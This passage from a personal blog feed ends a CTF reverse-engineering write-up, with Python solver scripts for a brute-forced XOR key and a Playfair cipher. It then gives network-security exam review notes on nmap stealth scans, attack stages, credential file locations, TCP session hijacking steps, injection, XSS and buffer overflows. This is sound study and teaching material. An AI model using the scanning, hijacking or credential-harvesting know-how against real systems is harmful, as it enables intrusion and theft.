class="image-caption"></div> </figure><p>OK, the hook works; now start the brute force.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pexpect</span><br><span class="line"><span class="keyword">from</span> sympy <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">data=[]</span><br><span class="line"><span class="keyword">with</span> open(<span class="string">'output.txt'</span>,<span class="string">'r'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> tmp=f.read().split(<span class="string">'\r\n'</span>)</span><br><span class="line"> data=[int(x,<span class="number">16</span>) <span class="keyword">for</span> x <span class="keyword">in</span> tmp]</span><br><span class="line">src=[<span class="number">0xA0</span>, <span class="number">0xE4</span>, <span class="number">0xBA</span>, <span class="number">0xFB</span>, <span class="number">0x10</span>, <span class="number">0xDD</span>, <span class="number">0xAC</span>, <span class="number">0x65</span>, <span class="number">0x8D</span>, <span class="number">0x0B</span>, <span class="number">0x57</span>, <span class="number">0x1A</span>, <span class="number">0xE4</span>, <span class="number">0x28</span>, <span class="number">0x96</span>, <span class="number">0xB3</span>, <span class="number">0x0C</span>, <span class="number">0x79</span>, <span class="number">0x4D</span>, <span class="number">0x80</span>, <span class="number">0x90</span>, <span class="number">0x99</span>, <span class="number">0x58</span>, <span class="number">0xFE</span>, <span class="number">0x50</span>, <span class="number">0xD3</span>, <span class="number">0xF9</span>, <span class="number">0x3C</span>, <span class="number">0x0F</span>, <span class="number">0xC1</span>, <span 
class="number">0xE3</span>, <span class="number">0xA6</span>, <span class="number">0x39</span>, <span class="number">0xC3</span>, <span class="number">0x28</span>, <span class="number">0x75</span>, <span class="number">0xF8</span>, <span class="number">0xC9</span>, <span class="number">0xC8</span>, <span class="number">0xCD</span>, <span class="number">0x78</span>, <span class="number">0x26</span>]</span><br><span class="line">flag=<span class="string">'flag{000000000000000000000000000000000000}'</span></span><br><span class="line"></span><br><span class="line">var=[]</span><br><span class="line"><span class="keyword">for</span> num <span class="keyword">in</span> range(<span class="number">42</span>):</span><br><span class="line"> exec(<span class="string">"x"</span>+str(num)+<span class="string">"=Symbol('x'+str(num))"</span>)</span><br><span class="line"> var.append(<span class="string">"x"</span>+str(num)) <span class="comment">#create the 42 variables x0~x41</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">256</span>):</span><br><span class="line"> r=pexpect.spawn(<span class="string">'./qemu-arm -L ./ ./aRm_getRand'</span>)</span><br><span class="line"> r.sendline(str(i))</span><br><span class="line"> r.sendline(flag)</span><br><span class="line"> r.readline()</span><br><span class="line"> r.readline()</span><br><span class="line"> rand=[]</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">42</span>*<span class="number">42</span>):</span><br><span class="line"> s=r.readline()</span><br><span class="line"> rand.append(int(str(s)[<span class="number">2</span>:<span class="number">-5</span>],<span class="number">16</span>))</span><br><span class="line"> r.wait()</span><br><span class="line"> exper=[]</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(<span 
class="number">42</span>):</span><br><span class="line"> anEx=<span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">42</span>):</span><br><span class="line"> anEx+=str(rand[j*<span class="number">42</span>+k])+<span class="string">"*"</span>+var[k]+<span class="string">"+"</span></span><br><span class="line"> anEx=anEx[:<span class="number">-1</span>]+<span class="string">"-"</span>+str(data[j])</span><br><span class="line"> exper.append(anEx)</span><br><span class="line"> res=solve(exper,var)</span><br><span class="line"> print(str(i)+<span class="string">": "</span>)</span><br><span class="line"> print(res.values())</span><br></pre></td></tr></table></figure></div><p>The brute force gives:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/QPZIM25mcpSU3Jv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>So the key is 82, and the xored v9 array has been recovered as well; a simple xor gives the flag:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">arr=[<span class="number">0xA0</span>, <span class="number">0xE4</span>, <span class="number">0xBA</span>, <span class="number">0xFB</span>, <span class="number">0x10</span>, <span class="number">0xDD</span>, <span class="number">0xAC</span>, <span class="number">0x65</span>, <span class="number">0x8D</span>, <span class="number">0x0B</span>, <span class="number">0x57</span>, <span class="number">0x1A</span>, <span class="number">0xE4</span>, <span class="number">0x28</span>, <span class="number">0x96</span>, <span class="number">0xB3</span>, <span class="number">0x0C</span>, <span class="number">0x79</span>, <span class="number">0x4D</span>, <span class="number">0x80</span>, <span 
class="number">0x90</span>, <span class="number">0x99</span>, <span class="number">0x58</span>, <span class="number">0xFE</span>, <span class="number">0x50</span>, <span class="number">0xD3</span>, <span class="number">0xF9</span>, <span class="number">0x3C</span>, <span class="number">0x0F</span>, <span class="number">0xC1</span>, <span class="number">0xE3</span>, <span class="number">0xA6</span>, <span class="number">0x39</span>, <span class="number">0xC3</span>, <span class="number">0x28</span>, <span class="number">0x75</span>, <span class="number">0xF8</span>, <span class="number">0xC9</span>, <span class="number">0xC8</span>, <span class="number">0xCD</span>, <span class="number">0x78</span>, <span class="number">0x26</span>]</span><br><span class="line">x=[<span class="number">198</span>, <span class="number">136</span>, <span class="number">219</span>, <span class="number">156</span>, <span class="number">107</span>, <span class="number">228</span>, <span class="number">152</span>, <span class="number">7</span>, <span class="number">239</span>, <span class="number">63</span>, <span class="number">97</span>, <span class="number">127</span>, <span class="number">134</span>, <span class="number">5</span>, <span class="number">247</span>, <span class="number">131</span>, <span class="number">109</span>, <span class="number">75</span>, <span class="number">96</span>, <span class="number">180</span>, <span class="number">241</span>, <span class="number">173</span>, <span class="number">57</span>, <span class="number">211</span>, <span class="number">49</span>, <span class="number">224</span>, <span class="number">157</span>, <span class="number">9</span>, <span class="number">34</span>, <span class="number">243</span>, <span class="number">129</span>, <span class="number">199</span>, <span class="number">1</span>, <span class="number">244</span>, <span class="number">31</span>, <span class="number">17</span>, <span class="number">157</span>, <span 
class="number">171</span>, <span class="number">252</span>, <span class="number">249</span>, <span class="number">64</span>, <span class="number">91</span>]</span><br><span class="line">flag=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">42</span>):</span><br><span class="line"> flag+=chr(x[i]^arr[i])</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/nfkJdxGXPvbhoqr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>flag{94bb46eb-a0a2-4a4a-a3d5-2ba877deb448}</strong></p><h2 id="pe"><a href="#pe" class="headerlink" title="pe"></a>pe</h2><p>ARM architecture; with no environment to debug in, it could only be read by hand XD. This challenge has a lot of strange functions, and following the pseudocode leads into functions within functions within functions... so it was mostly solved by guessing (</p><p>Continue to find main by tracing back from the strings.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/8tuVcrXQkSEIaWi.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/QesgnhHTZGCOjzY.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Judging by the arguments, sub_1400023C8() plays the role of strcmp(), and we need v9 to equal "KIMLXDWRZXTHXTHQTXTXHZWC".</p><p>Going further up, sub_1400015B0 is the function that uses v9, so step into it to see what it does.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/Ttskz41Y6CJrUf2.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>It looks like some kind of encryption: adjacent characters are taken two at a time, the same operation is applied to both, and then further processing follows.</p><p>Stepping into sub_1400012B8() shows what looks roughly like a search process</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/hRDOJ8wAFi52aVy.png" alt="" title=""> </div> <div class="image-caption"></div> 
</figure><p>如果不等于-1就说明在表中找到了这个元素,然后返回一个索引(?</p><p>再往下看好像就看不太懂了,然后就是玄学的猜猜猜= =</p><p>回去看string可以看到一个这个,猜测是密钥表之类的?</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/zo7s4FcXJb3EIvP.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>往上回溯也看不到什么线索,不过可以发现这25个数字刚好没有相同的。</p><p>现在总结一下这个古典加密算法的特点,大概是两个为一组处理+已定义的密钥表(即不是通过输入生成的)5*5+处理时用到索引。</p><p>很久很久以前想写某对cp的AU同人时想把ctf元素混进去,就看了很多简单又奇奇怪怪的编码/古典密码(现代密码太学术了XD),没想到现在有用武之地了(手动狗头。</p><p>然后翻到了一个符合这个特点的密码,Playfair Cipher:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/NTcqU3pazyZ5GQb.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>不同的是密码表是直接给出的,不过加密流程再对回ida里的反编译感觉挺像的,于是果断试试。</p><p>按照Playfair Cipher的加解密流程写出脚本:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getIndex</span><span class="params">(c)</span>:</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(key)):</span><br><span class="line"> <span class="keyword">if</span> key[i].find(c)!=<span class="number">-1</span>:</span><br><span class="line"> <span class="keyword">return</span> i,key[i].find(c)</span><br><span class="line">letter_list=<span class="string">"ABCDEFGHJKLMNOPQRSTUVWXYZ"</span></span><br><span class="line">key=[<span class="string">"CREIH"</span>,<span class="string">"TQGNU"</span>,<span class="string">"AOVXL"</span>,<span class="string">"DZKYM"</span>,<span class="string">"PBWFS"</span>]</span><br><span class="line">cipher=<span class="string">"KIMLXDWRZXTHXTHQTXTXHZWC"</span></span><br><span class="line">text=<span 
class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(cipher),<span class="number">2</span>):</span><br><span class="line"> j=i+<span class="number">1</span></span><br><span class="line"> x1,y1=getIndex(cipher[i])</span><br><span class="line"> x2,y2=getIndex(cipher[j])</span><br><span class="line"> <span class="keyword">if</span> x1==x2:</span><br><span class="line"> text+=key[x1][(y1+<span class="number">1</span>)%<span class="number">5</span>]+key[x2][(y2+<span class="number">1</span>)%<span class="number">5</span>]</span><br><span class="line"> <span class="keyword">elif</span> y1==y2:</span><br><span class="line"> text+=key[(x1+<span class="number">1</span>)%<span class="number">5</span>][y1]+key[(x2+<span class="number">1</span>)%<span class="number">5</span>][y2]</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> text+=key[x1][y2]+key[x2][y1]</span><br><span class="line"> i+=<span class="number">2</span></span><br><span class="line">print(text)</span><br></pre></td></tr></table></figure></div><p>走一遍脚本解密可以得到:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/WPy37pseOScbCUf.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>YES MAYBE YOU CAN RUN AN ARM PE</p><p>No, I can’t 😦</p><p>看起来能读的通,成功get flag。</p><p><strong>flag{YESMAYBEYOUCANRUNANARMPE}</strong></p>]]></content>
<summary type="html">
<p>Three Huawei competitions</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>Network Security Review</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/01/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%8D%E4%B9%A0/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/01/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%8D%E4%B9%A0/</id>
<published>2021-01-01T09:09:55.948Z</published>
<updated>2021-01-05T11:38:56.286Z</updated>
<content type="html"><![CDATA[<h1 id="网络安全复习"><a href="#网络安全复习" class="headerlink" title="网络安全复习"></a>Network Security Review</h1><a id="more"></a>
<h2 id="第一章-概论"><a href="#第一章-概论" class="headerlink" title="第一章 概论"></a>Chapter 1: Overview</h2>
<p>Main threats to network security</p>
<p>Trojan horses, hacker attacks, backdoors, computer viruses, denial-of-service attacks, internal and external leaks, worms, logic bombs, loss, tampering and destruction of information.</p>
<p>The three basic properties of network security: C I A (extended by five more)</p>
<p>Confidentiality, integrity, availability, authenticity and trustworthiness, non-repudiation, accountability, auditability, privacy</p>
<p>Types of hacker attack. Classified by security property: interruption, interception, modification, replay, fabrication. Classified by attack method: active attacks: masquerade, replay, message modification, denial of service.</p>
<p>Passive attacks: release of message contents, traffic analysis.</p>
<h2 id="第二章-网络攻击流程"><a href="#第二章-网络攻击流程" class="headerlink" title="第二章 网络攻击流程"></a>Chapter 2: Network Attack Process</h2>
<h3 id="黑客攻击流程"><a href="#黑客攻击流程" class="headerlink" title="黑客攻击流程"></a>Hacker attack process</h3>
<p>Footprinting -> Scanning -> Enumeration -> Gaining access / denial of service -> Privilege escalation -> Information theft -> Covering tracks -> Creating backdoors</p>
<h3 id="扫描基本步骤"><a href="#扫描基本步骤" class="headerlink" title="扫描基本步骤"></a>Basic scanning steps</h3>
<p>Determine whether the target system actually exists, determine which services are running or listening on it, and probe the operating system.</p>
<h3 id="nmap使用技巧"><a href="#nmap使用技巧" class="headerlink" title="nmap使用技巧"></a>nmap usage tips</h3>
<p>Common options:</p>
<ul>
<li>-sP: ping scan</li>
<li>-sn: Ping Scan - disable port scan. Probes hosts with ping without scanning ports (tested: even when the remote host drops all ICMP packets, it can still detect that the host is up).</li>
<li>-sA: sends TCP ACK packets as probes; can detect whether a host is alive.</li>
<li>SYN scan (half-open) -sS: sends a SYN packet to the target port. A SYN/ACK reply means the port is listening; an RST/ACK reply usually means it is not. The scanner then sends an RST/ACK, so a full connection is never established. Advantage: stealthier, the target system usually does not log it. Disadvantage: too many half-open connections create a denial-of-service condition and alert the other side.</li>
<li>TCP connect scan -sT: TCP scan using the full three-way handshake. Inefficient and slow; does not require root; easily noticed by the target system.</li>
<li>-sU: UDP port scan. An ICMP unreachable error message means the port is closed; a proper response means it is open. UDP port scanning is relatively slow.</li>
<li>FIN scan (stealth scan) -sF: another TCP scan; sends a packet with the FIN flag set. If the target port is closed the target system should return an RST packet; otherwise the packet is dropped. Usually only effective against UNIX TCP/IP stacks (Windows always returns RST). Since no part of the TCP three-way handshake is involved, it cannot be logged and is therefore stealthier than a SYN scan; FIN packets can pass packet filters that watch for SYN packets (stealth scan).</li>
<li>-sX: Xmas tree scan</li>
<li>-sN: NULL scan</li>
<li>-sV: version detection</li>
<li>TCP ACK scan (nmap -sA): tests firewall rule sets. Determines whether a firewall is a simple packet filter or an advanced stateful firewall with packet-filtering capability. Cannot be used to determine whether a port is open or closed.</li>
<li>TCP window scan (nmap -sW): tests whether ports on certain target systems (such as AIX and FreeBSD) are open or filtered; these systems return different TCP window size values.</li>
<li>TCP Maimon scan (nmap -sM): same principle as the TCP FIN scan except that the probe is FIN/ACK; an RST should be returned whether the port is open or not. Uriel noticed that many BSD-based systems simply drop the probe if the port is open.</li>
<li>UDP scan (nmap -sU): sends UDP packets to the target port. An "ICMP port unreachable" error message means the port is closed; if no such message is received, the port may be open. Remark: UDP does not require a connection to be established, so scan accuracy depends on many factors related to target network usage and filtering mechanisms (results are unreliable).</li>
</ul>
<h3 id="查点"><a href="#查点" class="headerlink" title="查点"></a>Enumeration</h3>
<p>A more thorough probing of the identified services:</p>
<ul>
<li>User account names (for subsequent password-guessing attacks)</li>
<li>Misconfigured shared resources (e.g. insecure file shares)</li>
<li>Old software versions with known security vulnerabilities (e.g. web servers with remote buffer overflows)</li>
</ul>
<h3 id="攻击实施"><a href="#攻击实施" class="headerlink" title="攻击实施"></a>Carrying out the attack</h3>
<p><strong>Categories</strong>: Destructive attacks: launched using tools. Intrusive attacks: use the collected information to find vulnerabilities in the system, then exploit them to gain the highest privileges possible.</p>
<p><strong>Main stages</strong>: Pre-attack probing: provides useful information for further intrusion. Password cracking and privilege escalation. Carrying out the attack: buffer overflow, denial of service, backdoors, trojans, viruses.</p>
<p><strong>Post-attack</strong>: Leaving backdoors: to retain and consolidate control of the system over a long period. Hiding tracks: deleting log files, modifying log files, replacing system programs.</p>
<h3 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>Penetration testing</h3>
<p>A security testing method that simulates an attacker's techniques and methods to defeat the target system's security controls and gain access.</p>
<p><strong>Categories</strong>:</p>
<p>White-box testing: penetration testing performed with internal knowledge of the organisation</p>
<p>Grey-box testing: penetration testing performed with partial internal knowledge</p>
<p>Black-box testing: penetration testing that simulates an attacker who knows nothing about the organisation</p>
<p><strong>Steps (seven)</strong></p>
<ol>
<li>Pre-engagement interaction: determine the scope, objectives, constraints and service contract details of the penetration test.</li>
<li>Intelligence gathering: obtain the target's network topology, system configuration, security defences and other information.</li>
<li>Threat modelling: model threats and plan attacks based on the gathered information.</li>
<li>Vulnerability analysis: combine the collected intelligence and identify exploitable points from vulnerability scan results, service enumeration and so on.</li>
<li>Exploitation: use the identified vulnerabilities to break into the system and gain access.</li>
<li>Post-exploitation: design attack objectives independently based on the target organisation's business model and the form of its protected assets; carry out attacks that could cause significant business impact.</li>
<li>Reporting: consolidate the key intelligence from all stages, the system vulnerabilities discovered and the successful exploitation process, together with an analysis of remediation and upgrade plans.</li>
</ol>
<h2 id="第四章-口令破解"><a href="#第四章-口令破解" class="headerlink" title="第四章 口令破解"></a>Chapter 4: Password Cracking</h2>
<p>Brute force: exhaustive search, slow.</p>
<p>Dictionary attack: builds a file of passwords the user might use, based on information about the user; fast.</p>
<p>Hybrid attack: appends a few letters or digits to the dictionary entries.</p>
<p>Social engineering: shoulder surfing, network sniffing, dumpster diving, replay.</p>
<h3 id="windows口令文件"><a href="#windows口令文件" class="headerlink" title="windows口令文件"></a>Windows password file</h3>
<p>1. The Security Account Manager (SAM) mechanism.</p>
<p>C:\Windows\System32\Config\SAM</p>
<p>2. The SAM file:</p>
<p>Contains the hashes of all user names and passwords on the local system or on the domain it controls.</p>
<h3 id="密码系统:"><a href="#密码系统:" class="headerlink" title="密码系统:"></a>Password system:</h3>
<p>/etc/passwd: contains the user name, the user's real name, identification information and basic information about each user; fields are separated by ":"<br>/etc/shadow: shadow password file, contains the encrypted passwords and password expiry times</p>
<p>/etc/group: lists all groups on the machine<br>/etc/gshadow: group shadow password file for all groups on the machine</p>
<h2 id="第五章-欺骗攻击"><a href="#第五章-欺骗攻击" class="headerlink" title="第五章 欺骗攻击"></a>Chapter 5: Spoofing Attacks</h2>
<p>Spoofing: an attack in which the attacker impersonates an identity to pass authentication and gain trust. Exploiting flaws in the authentication mechanism, the attacker disguises themself as a trusted party, communicates with the victim, and obtains information or launches further attacks.</p>
<p>Common spoofing attacks: IP spoofing, ARP spoofing, email spoofing, DNS spoofing, web spoofing.</p>
<p>IP spoofing. The IP protocol is connectionless; a trust relationship between two computers relies mainly on the IP addresses of the two parties.</p>
<p><strong>IP spoofing methods</strong>:</p>
<p>Simple IP address change: the attacker changes a computer's IP address to that of another host in order to impersonate it<br>Source routing attack: ensures that packets always traverse a predetermined path on which the attacker's machine sits<br>TCP session hijacking: taking over an existing dynamic session, so that the attacker replaces the original legitimate user while monitoring and controlling the session content</p>
<p>TCP session hijacking (Session Hijack): the process of taking over an existing dynamic session, in which the attacker replaces the original legitimate user while monitoring and controlling the session content. Session hijacking combines sniffing and spoofing techniques, is usually accompanied by denial of service (DoS), and does not depend on the operating system.</p>
<ol>
<li>Find the target: (1) the target is a server that accepts TCP session connections (e.g. Telnet, FTP); (2) whether the data stream can be observed.</li>
<li>Confirm the dynamic session.</li>
<li>Guess the sequence numbers: (1) through sniffing or ARP spoofing, first discover the sequence number the target is currently using, then from the sequence-number mechanism guess the next SEQ/ACK pair; (2) at the same time, if the attacker somehow disrupts the client host's SEQ/ACK, the server will no longer trust the client host's correct packets, so the attacker can impersonate the client host using the correct SEQ/ACK numbers; the attacking host can now connect to the server, and a session has been hijacked.</li>
<li>Take the client host offline: launch a denial-of-service attack against it.</li>
<li>Take over the session: (1) keep sending packets to the server and take over the whole session; (2) create an account to leave a backdoor.</li>
</ol>
<p><strong>Harm of TCP session hijacking</strong></p>
<p>1. By its principle of operation, any host communicating over the Internet may be subject to this attack.</p>
<p>2. Simple and practical session-hijacking software has appeared; the lowered technical barrier has produced many "script kiddie" attackers.</p>
<p>Reasons: the main one is that it does not depend on the operating system; another is that it can be used for active attacks, through which entry into the system may be gained.</p>
<h2 id="第六章-web攻击"><a href="#第六章-web攻击" class="headerlink" title="第六章 web攻击"></a>Chapter 6: Web Attacks</h2>
<h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL injection</h3>
<p><strong>1. Principle</strong></p>
<p>Exploiting a security flaw in how the web application handles backend database query statements, the attacker submits carefully crafted database query code and, from the returned results, obtains the data they want.</p>
<p><strong>2. Injection types</strong>: Ordinary injection: injection using union queries and the like. Error-based injection: injection based on error messages. Blind injection: boolean-based blind, time-based blind.</p>
<p><strong>3. Injection points</strong>: anywhere a database query statement is executed may be injectable.</p>
<p><strong>4. SQL injection prevention</strong>: (1) use prepared statements with bound variables; (2) strictly filter user-submitted data and input parameters; (3) abandon dynamic SQL statements and use stored procedures to access and manipulate data; (4) use safe functions; (5) principle of least privilege.</p>
<h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3>
<p>The attacker inserts malicious HTML code into a web page; when a user browses the page, the embedded malicious code executes, achieving the attacker's goal. Once successful, the attacker can steal user accounts, change user settings, steal or poison cookies, place fake advertisements, view host information, and so on.</p>
<p><strong>1. Conditions for launching a cross-site scripting attack</strong></p>
<p>The web server allows users to enter arbitrary characters in forms or edit boxes.</p>
<p>The web server stores the user input and displays it in pages returned to end users without removing illegal characters or re-encoding it.</p>
<p><strong>2. Conditions for a successful attack</strong></p>
<p>A web application with a cross-site scripting vulnerability is required</p>
<p>The user must click a link or visit a certain page</p>
<p><strong>3. Types</strong>: Reflected XSS (non-persistent XSS): simply "reflects" user input back to the browser; the attacker has to trick the user into clicking a malicious link. Stored XSS: the attack script is permanently stored in the target server's database or files, for example a blog post containing malicious JavaScript code. DOM-based XSS: attacks via the DOM (the document parsing facility).</p>
<p><strong>4. Defence</strong>. Users: mainly education.</p>
<p>Web application developers:</p>
<p>Perform reliable input validation on all user-submitted content.</p>
<p>Protect all sensitive functions from being executed automatically by bots or by third-party websites.</p>
<h3 id="web攻击防御"><a href="#web攻击防御" class="headerlink" title="web攻击防御"></a>Web attack defence</h3>
<p><strong>1. Simplicity</strong>: the simpler the host system, the more secure it is. Unnecessary services should be removed from the server.</p>
<p><strong>2. Superuser privileges</strong>: avoid using the superuser to maintain the system.</p>
<p><strong>3. Local and remote access control</strong>: access control specifies which users may access particular data, directories or functions of the system. An effective authentication mechanism should be implemented, including logging of user activity.</p>
<p><strong>4. Auditing and auditability</strong>: routinely auditing the records, searching the large volume of audit records generated by the system for suspicious data and for traces of attackers or malicious programs.</p>
<p><strong>5. Recovery</strong>: configuring a real-time or incremental backup policy is essential; in an emergency it preserves the server's critical data so that service can be restored quickly to reduce losses, and it facilitates subsequent forensics to trace the intruder.</p>
<h2 id="第七章-缓冲区溢出"><a href="#第七章-缓冲区溢出" class="headerlink" title="第七章 缓冲区溢出"></a>Chapter 7: Buffer Overflows</h2>
<p><strong>What is a buffer:</strong> a contiguous block of computer memory holding instances of the same data type; a contiguous region allocated in memory while the program runs, used to store data of various types including character arrays.</p>
<p><strong>Buffer overflow</strong>: writing more data into a fixed-length buffer than its allotted length, so that the buffer's data overflows and overwrites the memory around the buffer.</p>
<p>Differences between heap and stack:</p>
<ul>
<li>Allocation and management: heap: dynamically allocated, allocation and release are controlled by the programmer; stack: managed automatically by the compiler.</li>
<li>Fragmentation: heap: frequent new/delete or malloc()/free() inevitably makes memory non-contiguous, producing many fragments and lowering program efficiency; stack: a last-in first-out structure, a block can never be popped from the middle of the stack.</li>
<li>Growth direction: heap: grows towards increasing memory addresses; stack: grows towards decreasing memory addresses, from high addresses to low.</li>
</ul>
<p><strong><em>By carefully constructing the padding data, an attacker can change the values of variables in memory, alter the original control flow, and even hijack the process, execute malicious code and ultimately gain control of the system</em></strong>.</p>
<p><strong>Compared with other attack types, buffer overflow attacks are</strong>:</p>
<ul>
<li>highly technical</li>
<li>highly destructive</li>
<li>highly covert</li>
</ul>
<h3 id="缓冲区溢出原理"><a href="#缓冲区溢出原理" class="headerlink" title="缓冲区溢出原理"></a>Buffer overflow principles</h3>
<p>Stack overflow: the machine code in the code section of a PE file is loaded into the code region (.text) of memory. When a function call occurs, the call relationships and related information are saved dynamically in the stack region. If memory needs to be allocated dynamically, a suitable region is allocated in the heap.</p>
<p>Heap overflow: C uses malloc()/free() and C++ uses new/delete to allocate and free memory dynamically.</p>
<p>BSS overflow: the .bss section holds uninitialised global and static variables; its allocation is simple and the variables are stored contiguously. The two character arrays defined as follows are located in BSS: <code>static char buf1[16],buf2[16];</code> After writing 16 'A' characters into buf2 and then 24 'B' characters into buf1, because the variables are contiguous, the overflow of buf1 overwrites the value of buf2. Exploitation: overwriting pointers or function pointers in BSS changes the program's original execution flow, making a pointer jump to a specific memory address and perform a designated operation.</p>
<p>Format string overflow: a vulnerability arising when an output function parses the output format.</p>
<p>Integer overflow: when a computed result exceeds the specified width, the compiler generally discards the overflowing high-order part.</p>
<h3 id="防御"><a href="#防御" class="headerlink" title="防御"></a>Defences</h3>
<p>The root cause of buffer overflows is that the programming language lacks type safety and the program lacks bounds checking.</p>
<ol>
<li>Prevention strategies in system administration
<ol>
<li>Disable unneeded privileged programs</li>
<li>Patch program vulnerabilities promptly</li>
</ol>
</li>
<li>Prevention strategies during software development
<ol>
<li>Write correct code</li>
<li>Array bounds checking</li>
<li>Improve language function libraries</li>
<li>Program pointer integrity checking</li>
<li>Stack protection mechanisms</li>
</ol>
</li>
<li>Prevention measures while software runs
<ol>
<li>Non-executable buffers</li>
<li>Address space randomisation</li>
</ol>
</li>
</ol>
<p><strong>Source-level protection methods</strong></p>
<p><strong>Runtime protection methods</strong></p>
<p><strong>Preventing attack code from executing</strong></p>
<p><strong>Hardening the system</strong></p>
<h2 id="第十章-身份认证"><a href="#第十章-身份认证" class="headerlink" title="第十章 身份认证"></a>Chapter 10: Authentication</h2>
<p><strong>1. The AAA mechanism</strong>: Authentication: before any action is taken, the true identity of the actor must be identified; also called identification or verification. It mainly verifies user identity through identifiers and prevents attackers from impersonating legitimate users to gain access. Authorisation: once a user's identity is confirmed as legitimate, the user is granted permissions to operate on files, data and so on, including read, write, execute and ownership. Auditing: everyone should be accountable for the operations they perform, so a record must be left after every action so that responsibility can be verified.</p>
<p><strong>2. Authentication categories</strong></p>
<p>Password-based authentication: simple password authentication, one-way-function-based password authentication, one-time password authentication.<br>Biometric authentication.<br>Address-based authentication: each host stores account information for the other hosts allowed to access it, so once the peer's host address is confirmed, the user can be verified.</p>
<p>3. Common authentication technologies</p>
<p>Password-based authentication, cryptography-based authentication, token-based authentication, biometric authentication</p>
<p><strong>3. The Kerberos authentication protocol</strong></p>
<p>An authentication protocol based on a Trusted Third Party (TTP); an authentication service system developed by MIT's Athena Group, based on symmetric cryptography.</p>
<p>Basic idea (assumption): a user who can correctly decrypt the information is a legitimate user.</p>
<p>Three sub-protocols:</p>
<ol><li>Authentication Server exchange (AS exchange): between client C and the AS</li><li>Ticket-Granting Server exchange (TGS exchange): between C and the TGS</li><li>Client/Server authentication application exchange (AP exchange): between C and the application server S</li></ol>
<p>Composition: a complete Kerberos environment consists of a Kerberos server, a set of workstations and a set of application servers.</p>
<h2 id="第十一章-访问控制"><a href="#第十一章-访问控制" class="headerlink" title="第十一章 访问控制"></a>Chapter 11: Access Control</h2>
<p>Access control builds on authentication and controls resource access requests according to authorisation. It acts directly on confidentiality and integrity, and is a defence against unauthorised use of resources.</p>
<p>Access control policy models: Discretionary access control: an entity may be authorised, at its own discretion, to let another entity access certain resources. Mandatory access control: access is controlled by comparing security labels carrying security clearances. Role-based access control: access is controlled by the roles a user holds in the system and the permissions set for each role. Attribute-based access control: access is controlled by attributes of the user, the accessed resource and the current environment.</p>
<p>Access control mechanisms include: access control lists (ACL), capability lists, locks and keys, protection rings.</p>
<p>Formal computer security models: the Bell-LaPadula model for confidentiality policy, the Biba model for integrity policy.</p>
<h2 id="第十二章-防火墙"><a href="#第十二章-防火墙" class="headerlink" title="第十二章 防火墙"></a>Chapter 12: Firewalls</h2>
<h3 id="基本原理"><a href="#基本原理" class="headerlink" title="基本原理"></a>Basic principles</h3>
<p>1. A firewall is a set of components located between two networks that enforces inter-network access control. It is usually a dedicated computer, router or proprietary hardware device, and acts as the single entry point to the network.</p>
<ul>
<li>All traffic between the internal and external networks must pass through the firewall.</li>
<li>Only traffic that complies with the security policy may pass through the firewall.</li>
<li>The firewall itself is immune to penetration.</li>
</ul>
<p><strong>2. Handling actions</strong></p>
<p>ACCEPT: allow the packet or information through</p>
